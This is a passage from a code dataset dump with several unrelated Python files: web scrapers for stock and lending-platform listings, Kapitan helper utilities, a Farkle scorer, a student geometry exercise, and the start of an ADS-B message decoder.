See you Later!')\n print()\n","sub_path":"basic examples/dog_simulator.py","file_name":"dog_simulator.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534733539","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 18:30:26 2018\n\n@author: Administrator\n\"\"\"\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\ndef getHtml(url):\n try:\n r=requests.get(url)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n return r.text\n except:\n print('wrong!')\n return ''\n \ndef opreate(list1,list2,text):\n z=1\n soup=BeautifulSoup(text,'lxml')\n for i in soup.find_all('li'): \n for j in i.children:\n if j:\n try:\n z+=1\n #t=(j.attrs['href']).split('/')[-1]\n t=re.findall('s[hz]\\d{6}',j.attrs['href'])[0]\n #注:re.findall返回的是列表类型,所以要加[0],确保t是字符串\n if t[0:2]=='sz':\n list1.append(j.get_text())\n elif t[0:2]=='sh':\n list2.append(j.string)\n else:\n continue\n except: \n continue\n else:\n continue\n print('the length is',z) \n \ndef printText(list1,list2):\n c,q=(1,1)\n print('深圳')\n for i in list1:\n print(i)\n c=c+1\n print('上海')\n for i in list2:\n print(i)\n q=q+1\n print(c+q)\n\n \ndef main():\n url='http://quote.eastmoney.com/stocklist.html'\n a=[]\n b=[]\n t=getHtml(url)\n opreate(a,b,t)\n printText(a,b)\nmain()\n \n","sub_path":"网络爬虫/股票信息爬虫.py","file_name":"股票信息爬虫.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391383627","text":"# encoding:utf-8\nimport json\nimport os\nimport time\nfrom urllib import request\nimport re\nimport loguru\nfrom bs4 import BeautifulSoup\n\nlogger = loguru.logger\nfolder = './data'\nheaders = {\n 'Referer': 'http://xueshu.baidu.com/',\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Connection\": \"keep-alive\",\n \"Cache-Control\": \"max-age=0\",\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,la;q=0.7,pl;q=0.6\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\"\n}\n\nplatforms = ['国资控股', '国资参股', '上市控股', '上市参股', '风投系', '银行系', '民营系']\n\n\ndef down_html(url, retry=3):\n try:\n req = request.Request(url=url, headers=headers)\n resp = request.urlopen(req, timeout=5)\n\n if resp.status != 200:\n logger.error('url open error. 
url = {}'.format(url))\n        html_doc = resp.read()\n        if html_doc is None or html_doc.strip() == '':\n            logger.error('NULL html_doc')\n        return html_doc\n    except Exception as e:\n        logger.error(\"failed and retry to download url {}\".format(url))\n        if retry > 0:\n            time.sleep(1)\n            retry -= 1\n            return down_html(url, retry)\n\n\ndef main():\n    base_url = \"https://www.wdzj.com/dangan/search?filter&currentPage=\"\n\n    for p in range(1, 21):\n        url = base_url+str(p)\n        logger.info(\"page = %s\" % (str(p)))\n        html = down_html(url)\n        soup = BeautifulSoup(html, 'lxml')\n        terraceList = soup.find('ul', {'class': 'terraceList'})\n        items = terraceList.findAll('li', {'class': 'item'})\n        for item in items:\n            entity = {}\n            itemTitle = item.find('div', {'class': 'itemTitle'})\n            entity['title'] = itemTitle.h2.text.strip().split('\\n')[0]\n            entity['tags'] = [t.text.strip() for t in itemTitle.findAll(\n                'div', {'class': 'itemTitleTag tag'})]\n\n            clearfix = item.find('div', {'class': 'itemCon clearfix'})\n            itemConLeft = clearfix.find('a', {'class': 'itemConLeft'})\n            entity['boxs'] = [box.text.strip() for box in itemConLeft.findAll(\n                'div', {'class': 'itemConBox'})]\n            fname = entity['title']+'.json'\n            json.dump(entity, open(os.path.join(folder, fname), 'w'))\n            logger.info(\"%s dump!\" % (str(entity['title'])))\n\n\ndef post_process():\n    f1 = open('neo4j_format_entity.txt', 'w')\n    f2 = open('neo4j_format_relation.txt', 'w')\n\n    for fname in os.listdir(folder)[:]:\n        organ = {}\n        item = json.load(open(os.path.join(folder, fname), 'r'))\n        title = item['title'].strip()\n        platform = ''\n        address = item['boxs'][2].strip()\n        address = address[len('注册地:'):].split('|')\n        for p in platforms:\n            if ''.join(item['tags']).find(p) != -1:\n                platform = p\n                break\n        if platform == '':\n            logger.info('remove %s' % (title))\n            os.remove(os.path.join(folder, fname))\n            continue\n\n        organ['名称'] = item['title'].split('\\n')[0]\n        for tag in item['tags']:\n            try:\n                k, v = tag.split('\\n')[0].strip(), tag.split('\\n')[2].strip()\n                organ[k] = v\n            except IndexError:\n                continue\n        organ['参考利率'] = item['boxs'][0].split('\\n')[1].strip()\n        organ['待还余额'] = item['boxs'][1].split(':')[1].strip()\n        organ['上线时间'] = item['boxs'][3].split(':')[1].strip()\n        tmp = re.sub(r'\\s', '', item['boxs'][-1]).strip()\n        organ['网友印想'] = tmp[5:tmp.find('综合评分')+1]\n        organ['综合评分'] = tmp[tmp.find('综合评分')+4:].split(',')[0]\n        organ['点评人数'] = tmp[tmp.find('综合评分')+4:].split(',')[1]\n        organ['注册地'] = address[0]\n        # title platform address\n        entity_organ = \"(%s:机构 {\" % (organ['名称'])\n        for k, v in organ.items():\n            if k == '名称':\n                entity_organ += \"%s:'%s'\" % (k, v)\n            else:\n                entity_organ += \",%s:'%s'\" % (k, v)\n        entity_organ += \"}),\\n\"\n        entity_platform = \"(%s:平台 %s),\\n\" % (platform, {'名称': platform})\n        entity_address = \"(%s:省份 %s),\\n\" % (\n            organ['注册地'], {'名称': organ['注册地']})\n        rel_organ_platform = '(%s)-[:属于]->(%s),\\n' % (organ['名称'], platform)\n        rel_organ_address = '(%s)-[:注册]->(%s),\\n' % (organ['名称'], organ['注册地'])\n        f1.write(entity_organ)\n        f1.write(entity_platform)\n        f1.write(entity_address)\n        f2.write(rel_organ_platform)\n        f2.write(rel_organ_address)\n\n    f1.close()\n    f2.close()\n\n\n# 实体:平台,机构,注册地\nif __name__ == '__main__':\n    # main()\n    post_process()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"232010062","text":"import collections\nimport json\nimport shutil\nimport os\nfrom pathlib import Path as P\nfrom typing import Callable\n\nimport 
click\nimport requests\nimport yaml\n\n# pylint: disable=redefined-builtin\nfrom requests.exceptions import ConnectionError, HTTPError\nfrom url_normalize import url_normalize\nfrom kapitan import cached\nfrom kapitan import targets\nfrom kapitan import defaults\nfrom kapitan.cached import reset_cache as reset_reclass_cache\nfrom kapitan.refs.base import RefController, PlainRef\nfrom kapitan.refs.secrets.vaultkv import VaultBackend\n\nfrom commodore import __install_dir__\nfrom commodore.config import Config\n\n\nArgumentCache = collections.namedtuple(\"ArgumentCache\", [\"inventory_path\"])\n\n\nclass FakeVaultBackend(VaultBackend):\n def __init__(self):\n \"init FakeVaultBackend ref backend type\"\n super().__init__(None)\n\n def __getitem__(self, ref_path):\n return PlainRef(ref_path)\n\n\nclass ApiError(Exception):\n pass\n\n\ndef yaml_load(file):\n \"\"\"\n Load single-document YAML and return document\n \"\"\"\n with open(file, \"r\") as f:\n return yaml.safe_load(f)\n\n\ndef yaml_load_all(file):\n \"\"\"\n Load multi-document YAML and return documents in list\n \"\"\"\n with open(file, \"r\") as f:\n return list(yaml.safe_load_all(f))\n\n\ndef yaml_dump(obj, file):\n \"\"\"\n Dump obj as single-document YAML\n \"\"\"\n with open(file, \"w\") as outf:\n yaml.dump(obj, outf)\n\n\ndef yaml_dump_all(obj, file):\n \"\"\"\n Dump obj as multi-document YAML\n \"\"\"\n with open(file, \"w\") as outf:\n yaml.dump_all(obj, outf)\n\n\ndef lieutenant_query(api_url, api_token, api_endpoint, api_id):\n try:\n r = requests.get(\n url_normalize(f\"{api_url}/{api_endpoint}/{api_id}\"),\n headers={\"Authorization\": f\"Bearer {api_token}\"},\n )\n except ConnectionError as e:\n raise ApiError(f\"Unable to connect to Lieutenant at {api_url}\") from e\n try:\n resp = json.loads(r.text)\n except json.JSONDecodeError:\n resp = {\"message\": \"Client error: Unable to parse JSON\"}\n try:\n r.raise_for_status()\n except HTTPError as e:\n extra_msg = \".\"\n if r.status_code >= 400:\n extra_msg = f\": {resp['reason']}\"\n raise ApiError(f\"API returned {r.status_code}{extra_msg}\") from e\n else:\n return resp\n\n\ndef _verbose_rmtree(tree, *args, **kwargs):\n click.echo(f\" > deleting {tree}/\")\n shutil.rmtree(tree, *args, **kwargs)\n\n\ndef clean_working_tree(config: Config):\n # Defining rmtree as a naked Callable means that mypy won't complain about\n # _verbose_rmtree and shutil.rmtree having slightly different signatures.\n rmtree: Callable\n if config.debug:\n rmtree = _verbose_rmtree\n else:\n rmtree = shutil.rmtree\n click.secho(\"Cleaning working tree\", bold=True)\n rmtree(\"inventory\", ignore_errors=True)\n rmtree(\"dependencies\", ignore_errors=True)\n rmtree(\"compiled\", ignore_errors=True)\n rmtree(\"catalog\", ignore_errors=True)\n\n\n# pylint: disable=too-many-arguments\ndef kapitan_compile(\n config: Config,\n target=\"cluster\",\n output_dir=\"./\",\n search_paths=None,\n fake_refs=False,\n fetch_dependencies=True,\n reveal=False,\n):\n if not search_paths:\n search_paths = []\n search_paths = search_paths + [\n \"./\",\n __install_dir__,\n ]\n reset_reclass_cache()\n refController = RefController(\"./catalog/refs\")\n if fake_refs:\n refController.register_backend(FakeVaultBackend())\n click.secho(\"Compiling catalog...\", bold=True)\n cached.args[\"compile\"] = ArgumentCache(inventory_path=\"./inventory\")\n targets.compile_targets(\n inventory_path=\"./inventory\",\n search_paths=search_paths,\n output_path=output_dir,\n targets=[target],\n parallel=4,\n labels=None,\n 
ref_controller=refController,\n verbose=config.trace,\n prune=False,\n indent=2,\n reveal=reveal,\n cache=False,\n cache_paths=None,\n fetch_dependencies=fetch_dependencies,\n validate=False,\n schemas_path=\"./schemas\",\n jinja2_filters=defaults.DEFAULT_JINJA2_FILTERS_PATH,\n )\n\n\ndef rm_tree_contents(basedir):\n \"\"\"\n Delete all files in directory `basedir`, but do not delete the directory\n itself.\n \"\"\"\n basedir = P(basedir)\n if not basedir.is_dir():\n raise ValueError(\"Expected directory as argument\")\n for f in basedir.glob(\"*\"):\n if f.name.startswith(\".\"):\n # pathlib's glob doesn't filter hidden files, skip them here\n continue\n if f.is_dir():\n shutil.rmtree(f)\n else:\n os.unlink(f)\n\n\ndef relsymlink(srcdir, srcname, destdir, destname=None):\n if destname is None:\n destname = srcname\n # pathlib's relative_to() isn't suitable for this use case, since it only\n # works for dropping a path's prefix according to the documentation. See\n # https://docs.python.org/3/library/pathlib.html#pathlib.PurePath.relative_to\n link_src = os.path.relpath(P(srcdir) / srcname, start=destdir)\n link_dst = P(destdir) / destname\n if link_dst.exists():\n os.remove(link_dst)\n os.symlink(link_src, link_dst)\n\n\ndef delsymlink(linkname: P, debug=False):\n \"\"\"\n A convenience function to remove a symlink.\n\n Ensures the target path actually exists and is a symlink before deleting, or\n noops.\n \"\"\"\n\n # This will also be False in case it doesn't exist.\n if linkname.is_symlink():\n if debug:\n click.echo(f\"Deleting symlink: {linkname}\")\n linkname.unlink()\n else:\n if debug:\n click.echo(f\"Trying to delete non-symlink path {linkname}. No deleting!\")\n","sub_path":"commodore/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"124379195","text":"\"\"\"\n\twritten and tested in Python 3.3.6\n\"\"\"\n\nfrom random import randint\nimport collections\n\ndef score(my_roll, sides=6):\n\t\"\"\"\n\t\tCalculate a Farkle score using the traditional scoring method, which is:\n\t\t\t4 1s: 2,000 points\n\t\t\t3 1s: 1,000 points\n\t\t\tSingle 1: 100 points\n\t\t\tSingle 5: 50 points\n\t\t\tTriple of any non-1 number: 100 x number showing\n\t\t\tQuadruple of any non-1 number: Double the triple score\n\t\t\t\n\t\tNotes:\n\t\t\t- Doubles score nothing (unless a 1 or a 5) as above\n\t\t\t- All scoring dice must be rolled in a single turn (i.e. 
they\n\t\t\tare not additive over turns)\n\t\t\t- Rolling all 6 will be two sets and scored accordingly\n\t\t\t\t[4] + [2]\n\t\t\t\t[3] + [3]\n\t\t\t\t[2] + [2] + [2]\n\t\t\t\t\n\t\tExamples:\n\t\t\t1,1,1,5,5,5 ==> 1250 (1000 for 1s + 250 for 3 5s)\n\t\t\t1,1,1,1,6,6 ==> 2000 (2000 for 4 1s)\n\t\t\t5,3,6,5,3,3 ==> 400 (300 for 3 3s + 100 for 2 5s)\n\t\t\t1,2,2,3,3,5 ==> 150 (100 for a 1 and 50 for a 5)\n\t\"\"\"\n\t#create a table to hold the count of each die roll\n\tdice_array = [0] * sides\n\tscore = 0\n\tcounts = collections.Counter(my_roll)\n\tprint(counts)\n\t#add up the number appearances of each die roll and store it in the table\n\t\n\tfor dice in my_roll:\n\t\tdice_array[dice-1] += 1\n\n\t\"\"\"\n\t\tbased on the above scoring, determine the MAXIMUM score; in actual Farkle the\n\t\tplayer would choose which die to 'bank' and which to re-roll\n\t\"\"\"\n\tfor (dice, count) in enumerate(dice_array, start=1):\t\t\n\t\tif dice == 1:\n\t\t\tif count == 6: score += 2200\n\t\t\tif count == 5: score += 2100\t\t\t\n\t\t\tif count == 4: score += 2000\n\t\t\tif count == 3: score += 1000\n\t\t\tif count in [1, 2]: score += (count * 100)\n\t\telse:\n\t\t\tif count >= 4: score += (dice * 200)\n\t\t\tif count >= 3: score += (dice * 100)\n\t\t\tif (dice == 5 and count != 3): score += (count * 50) \n\n\treturn score\n\t\t\n#test cases\nwhile True:\n\troll = input(\"Enter 6 values (1-6) separated by a space: \")\n\troll = [randint(1,6) for i in range(0, 6)] if roll == \"\" else [int(i) for i in roll.split(' ')]\n\tprint(str(score(roll)) + \" : \" + str(roll))","sub_path":"python/Personal Projects/farkle/highest_roll.py","file_name":"highest_roll.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31322326","text":"#!/usr/bin/env python\n\n# This is a hacked-up version of the arietta module from Akane, with\n# the XSPF reader and ID3 tag support commented out.\n\n# This program is free software and is released under the terms of the\n# following MIT License:\n\n## START OF LICENSE ##\n\"\"\"\nCopyright (c) 2012 Daniel Sim (foxhead128)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n## END OF LICENSE ##\n\ndef do_nothing():\n return\n\nimport os.path\nimport sys\n\ntry:\n filename = __file__\nexcept:\n __file__ = sys.executable\nelse:\n del filename\napp_lib = os.path.join(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(app_lib)\n\nif sys.version_info[0] >= 3:\n def unicode(data):\n return str(data)\n def unichr(data):\n return chr(data)\n# import stagger\n# from html.parser import HTMLParser\n from html.entities import name2codepoint\nelse:\n# import id3\n# import HTMLParser\n from htmlentitydefs import name2codepoint\n\nimport re\n\ntry: from urllib.parse import unquote, quote\nexcept ImportError:\n try: from urllib import unquote, quote\n except:\n do_nothing()\n\nfrom xml.sax.saxutils import escape, quoteattr\n\ntry: from urllib.request import urlopen\nexcept ImportError:\n try: from urllib2 import urlopen\n except:\n do_nothing()\n\n_entity_re = re.compile(r'&(?:(#)(\\d+)|([^;]+));')\n\ndef get_mimetype(filename):\n if os.path.exists(metaunquote(filename).replace(\"file://\", \"\")):\n try: f = urlopen(\"file://\" + metaunquote(filename).replace(\"file://\",\"\"))\n except:\n print(\"Error! Something went wrong!\")\n else:\n return f.headers['content-type']\n else:\n print(\"Error! File does not exist!\")\n return None\n\ndef _repl_func(match):\n if match.group(1): # Numeric character reference\n return unichr(int(match.group(2)))\n else:\n return unichr(name2codepoint[match.group(3)])\n\ndef handle_html_entities(data):\n return unescape(_entity_re.sub(_repl_func, data))\n \ndef metaunquote(data):\n return handle_html_entities(unquote(data))\n\ndef unescape(text):\n \"\"\"Removes HTML or XML character references \n and entities from a text string.\n keep &, >, < in the source code.\n from Fredrik Lundh\n http://effbot.org/zone/re-sub.htm#unescape-html\n \"\"\"\n def fixup(m):\n text = m.group(0)\n if text[:2] == \"&#\":\n # character reference\n try:\n if text[:3] == \"&#x\":\n return unichr(int(text[3:-1], 16))\n else:\n return unichr(int(text[2:-1]))\n except ValueError:\n print(\"Value error!\")\n pass\n else:\n # named entity\n try:\n if text[1:-1] == \"amp\":\n text = \"&amp;\"\n elif text[1:-1] == \"gt\":\n text = \"&gt;\"\n elif text[1:-1] == \"lt\":\n text = \"&lt;\"\n else:\n print(text[1:-1])\n text = unichr(name2codepoint[text[1:-1]])\n except KeyError:\n print(\"Key error!\")\n pass\n return text # leave as is\n return re.sub(\"&#?\\w+;\", fixup, text)\n\n# The following function scans a file for ID3 tags, using either stagger (if Python 3) or id3 (if Python 2). 
It then returns a dictionary containing whatever tags it was able to retrieve:\n\"\"\"def get_tags(path):\n if os.path.exists(metaunquote(path.replace(\"file://\", \"\"))):\n path = metaunquote(path.replace(\"file://\", \"\"))\n elif os.path.exists(path.replace(\"file://\", \"\")):\n path = path.replace(\"file://\", \"\")\n if os.path.exists(path):\n if sys.version_info[0] >= 3:\n try: tags = stagger.read_tag(metaunquote(path.replace(\"file://\", \"\")))\n except:\n tags = \"\"\n title = \"(Untitled)\"\n artist = \"Unknown Artist\"\n album = \"Unknown Album\"\n date = \"Unknown\"\n genre = \"Unknown\"\n if sys.version_info[0] >= 3:\n try: tags.title\n except:\n do_nothing()\n else:\n if type(tags.title) is str and tags.title != \"\":\n try: title = tags.title\n except:\n do_nothing()\n try: tags.artist\n except:\n do_nothing()\n else:\n if type(tags.artist) is str and tags.artist != \"\":\n try: artist = tags.artist\n except:\n do_nothing()\n try: tags.album\n except:\n do_nothing()\n else:\n if type(tags.album) is str and tags.album != \"\":\n try: album = tags.album\n except:\n do_nothing()\n try: tags.date\n except:\n do_nothing()\n else:\n if type(tags.date) is str and tags.date != \"\":\n try: date = tags.date\n except:\n do_nothing()\n try: tags.genre\n except:\n do_nothing()\n else:\n if type(tags.genre) is str and tags.genre != \"\":\n try: genre = tags.genre\n except:\n do_nothing()\n else:\n path = metaunquote(path.replace(\"file://\", \"\")).replace(\"%20\", \" \")\n try: id3.title(path)\n except:\n do_nothing()\n else:\n if type(id3.title(path)) is unicode and id3.title(path) != \"\":\n try: title = id3.title(path)\n except:\n do_nothing()\n try: id3.artist(path)\n except:\n do_nothing()\n else:\n if type(id3.artist(path)) is unicode and id3.artist(path) != \"\":\n try: artist = id3.artist(path)\n except:\n do_nothing()\n try: id3.album(path)\n except:\n do_nothing()\n else:\n if type(id3.album(path)) is unicode and id3.album(path) != \"\":\n try: album = id3.album(path)\n except:\n do_nothing()\n try: id3.date(path)\n except:\n do_nothing()\n else:\n if type(id3.date(path)) is unicode and id3.date(path) != \"\":\n try: date = id3.date(path)\n except:\n do_nothing()\n try: id3.genre(path)\n except:\n do_nothing()\n else:\n if type(id3.genre(path)) is unicode and id3.genre(path) != \"\":\n try: genre = id3.genre(path)\n except:\n do_nothing()\n return {'title' : unicode(title), 'artist' : unicode(artist), 'album' : unicode(album), 'year' : unicode(date), 'date' : unicode(date), 'genre' : unicode(genre)}\n\n# This is for reading XSPF files:\nif sys.version_info[0] >= 3:\n class XSPFReader(HTMLParser):\n event_list = []\n event_contents = \"\"\n tag = \"\"\n def handle_starttag(self, tag, attrs):\n self.tag = tag\n def handle_startendtag(self, tag, attrs):\n self.tag = tag\n self.attributes = attrs\n def handle_endtag(self, tag):\n self.tag = \"\"\n def handle_data(self, data):\n if self.tag == \"playlist\":\n self.playlist = []\n elif self.tag == \"location\":\n self.playlist.append(data)\nelse:\n class XSPFReader(HTMLParser.HTMLParser):\n event_list = []\n event_contents = \"\"\n tag = \"\"\n def handle_starttag(self, tag, attrs):\n self.tag = tag\n def handle_startendtag(self, tag, attrs):\n self.tag = tag\n self.attributes = attrs\n def handle_endtag(self, tag):\n self.tag = \"\"\n def handle_data(self, data):\n if self.tag == \"playlist\":\n self.playlist = []\n elif self.tag == \"location\":\n 
self.playlist.append(data)\"\"\"\n","sub_path":"accessories/konoe/konoe_lib/manila.py","file_name":"manila.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"362497467","text":"#gyakorlás\n\nprint(\"1 - Háromszög\")\nprint(\"2 - Kör\")\nprint(\"3 - Téglalap\")\nprint(\"4 - Nyolcszög\")\nv=input(\"Milyen alakztattal szeretnél dolgozni?\")\nif v==\"1\":\n\tharomszogKerulet()\n\tharomszogTerulet()\nif v==\"2\":\n\tkorKerulet()\n\tkorTerulet()\nif v==\"3\":\n\tteglalapKerulet()\n\tteglalapTerulet()\nif v==\"4\":\n\tnyolcszogKerulet()\n\tnyolcszogTerulet()\n \ndef triangle(a,b,c):\n print(\"perimeter: \",a+b+c)\ntriangle(3,4,5)\n\ndef triangle(a,b,c):\n print(\"ker: \",a+b+c)\na = input(\"a oldal: \")\nb = input(\"b oldal: \")\nc = input(\"c oldal: \")\ntriangle(a,b,c)\n","sub_path":"kerterlt.py","file_name":"kerterlt.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255575142","text":"# Import functions and libraries\nfrom __future__ import division\nimport numpy as np, matplotlib.pyplot as plt\nfrom numpy import *\nfrom numpy.fft import *\nfrom matplotlib.pyplot import *\nfrom rtlsdr import RtlSdr\nimport threading,time, queue\n\nfrom bokeh.plotting import figure, show\nfrom bokeh.io import push_notebook, output_notebook\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.glyphs import Oval, Text, Circle\nfrom bokeh.tile_providers import get_provider\nimport math\nfrom IPython.display import clear_output\nimport sys\n\noutput_notebook()\n\ndef bit2byte( bits ):\n msg = np.zeros( MODES_LONG_MSG_BYTES, dtype='int' )\n\n # Pack bits into bytes */\n for i in r_[:MODES_LONG_MSG_BITS:8]:\n for j in r_[:8]:\n msg[ i // 8] = msg[ i // 8] + (int(bits[i+j]) << (7-j))\n return msg\n\n\nclass Plane:\n addr = -1\n flightnum = 'UNKNOWN'\n position = (-1,-1)\n planetype = 0\n lat0 = 0\n lat1 = 0\n lon0 = 0\n lat0 = 0\n time0 = -1\n time1 = -1\n heading = 0\n \n def __init__( self, addr):\n self.addr = addr\n \n def addplanetype( self, planetype ):\n self.planetype = planetype\n \n def addflightnum( self, flightnum ):\n self.flightnum = flightnum\n \n def addposition( self, position ):\n self.position = position\n\n \nMODES_LONG_MSG_BITS = 112\nMODES_SHORT_MSG_BITS = 56\nMODES_LONG_MSG_BYTES = (112//8)\nMODES_SHORT_MSG_BYTES = (56//8)\n\nmodes_checksum_table = [\n0x3935ea, 0x1c9af5, 0xf1b77e, 0x78dbbf, 0xc397db, 0x9e31e9, 0xb0e2f0, 0x587178,\n0x2c38bc, 0x161c5e, 0x0b0e2f, 0xfa7d13, 0x82c48d, 0xbe9842, 0x5f4c21, 0xd05c14,\n0x682e0a, 0x341705, 0xe5f186, 0x72f8c3, 0xc68665, 0x9cb936, 0x4e5c9b, 0xd8d449,\n0x939020, 0x49c810, 0x24e408, 0x127204, 0x093902, 0x049c81, 0xfdb444, 0x7eda22,\n0x3f6d11, 0xe04c8c, 0x702646, 0x381323, 0xe3f395, 0x8e03ce, 0x4701e7, 0xdc7af7,\n0x91c77f, 0xb719bb, 0xa476d9, 0xadc168, 0x56e0b4, 0x2b705a, 0x15b82d, 0xf52612,\n0x7a9309, 0xc2b380, 0x6159c0, 0x30ace0, 0x185670, 0x0c2b38, 0x06159c, 0x030ace,\n0x018567, 0xff38b7, 0x80665f, 0xbfc92b, 0xa01e91, 0xaff54c, 0x57faa6, 0x2bfd53,\n0xea04ad, 0x8af852, 0x457c29, 0xdd4410, 0x6ea208, 0x375104, 0x1ba882, 0x0dd441,\n0xf91024, 0x7c8812, 0x3e4409, 0xe0d800, 0x706c00, 0x383600, 0x1c1b00, 0x0e0d80,\n0x0706c0, 0x038360, 0x01c1b0, 0x00e0d8, 0x00706c, 0x003836, 0x001c1b, 0xfff409,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 
0x000000,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000\n] \n\n\ndef modesChecksum(msg, bits):\n    crc = 0\n\n    if (bits == 112):\n        offset = 0\n    else:\n        offset = 112 - 56\n\n    for j in r_[:bits]:\n\n        byte = j//8\n        bit = j%8\n        bitmask = 1 << (7 - bit)\n\n        # If bit is set, xor with corresponding table entry.\n        if (msg[byte] & bitmask):\n            crc ^= modes_checksum_table[j+offset]\n    \n    return crc # 24 bit checksum. \n\n\ndef modesMessageLenByType( type ):\n    if ( type == 16 or type == 17 or type == 19 or type == 20 or type == 21):\n        return MODES_LONG_MSG_BITS\n    else:\n        return MODES_SHORT_MSG_BITS\n\n    \ndef fixSingleBitErrors( msg, bits ):\n    # Try flipping each bit in turn; keep the first flip that makes the CRC check pass.\n    for j in r_[:bits]:\n        byte = j // 8\n        bitmask = 1 << (7 - (j%8))\n        \n        aux = msg[:bits//8].copy()\n        aux[byte] = aux[byte] ^ bitmask\n        \n        crc1 = (aux[(bits//8)-3] << 16) |(aux[(bits//8)-2] << 8) |aux[(bits//8)-1];\n        crc2 = modesChecksum(aux,bits)\n        \n        crcok = (crc1 == crc2)\n        if ( crcok ):\n            for i in r_[:bits//8]:\n                msg[i] = aux[i]\n            return crcok\n        \n    return False\n\n    \ndef NL( rlat ):\n    # A.1.7.2.d (page 9)\n    NZ = 15\n    return np.floor( 2 * np.pi / \n            (np.arccos( 1 - (1 - np.cos( np.pi / (2 * NZ )) ) \n            / np.cos( np.pi / 180 * abs(rlat) ) ** 2 )))\n\n\ndef cprN( lat, isodd):\n    nl = NL(lat) - isodd;\n    if (nl < 1):\n        nl = 1;\n    return nl;\n\n\ndef Dlon( lat, isodd):\n    return 360.0 / cprN(lat, isodd)\n\n    \ndef cprmod( a, b ):\n    res = a % b;\n    if (res < 0):\n        res = res + b;\n    return res;\n\n\ndef decodeCPR( plane ):\n    AirDlat0 = 360.0 / 60\n    AirDlat1 = 360.0 / 59\n    \n    lat0 = plane.lat0\n    lat1 = plane.lat1\n    lon0 = plane.lon0\n    lon1 = plane.lon1\n    \n    j = np.floor(((59*lat0 - 60*lat1) / 131072) + 0.5)\n    \n    rlat0 = AirDlat0 * (cprmod(j,60) + lat0 / 131072)\n    rlat1 = AirDlat1 * (cprmod(j,59) + lat1 / 131072)\n    \n    if (rlat0 >= 270):\n        rlat0 = rlat0 - 360\n    \n    if (rlat1 >= 270):\n        rlat1 = rlat1 - 360\n    \n    if (NL(rlat0) != NL(rlat1)):\n        return;\n    \n    if (plane.time0 > plane.time1) :\n\n        # Use even packet.\n        ni = cprN(rlat0,0);\n        m = np.floor((((lon0 * (NL(rlat0)-1)) -\n                      (lon1 * NL(rlat0))) / 131072) + 0.5);\n        lon = Dlon(rlat0,0) * (cprmod(m,ni)+lon0/131072);\n        lat = rlat0;\n    else:\n        # Use odd packet\n        ni = cprN(rlat1,1);\n        m = np.floor((((lon0 * (NL(rlat1)-1)) - \n                      (lon1 * NL(rlat1))) / 131072) + 0.5);\n        lon = Dlon(rlat1,1) * (cprmod(m,ni)+lon1/131072);\n        lat = rlat1;\n    if ( lon > 180 ):\n        lon = lon - 360;\n    \n    plane.addposition( (lat, lon) )\n\n\ndef decodeModesMessage( msg, plane_list, log ):\n    \n    ais_charset = np.array( list(\"?ABCDEFGHIJKLMNOPQRSTUVWXYZ????? ???????????????0123456789??????\"))\n    \n    # Get the message type ASAP as other operations depend on this\n    msgtype = msg[0] >> 3\n    msgbits = modesMessageLenByType(msgtype)\n    \n    \n    # Get checksum. 
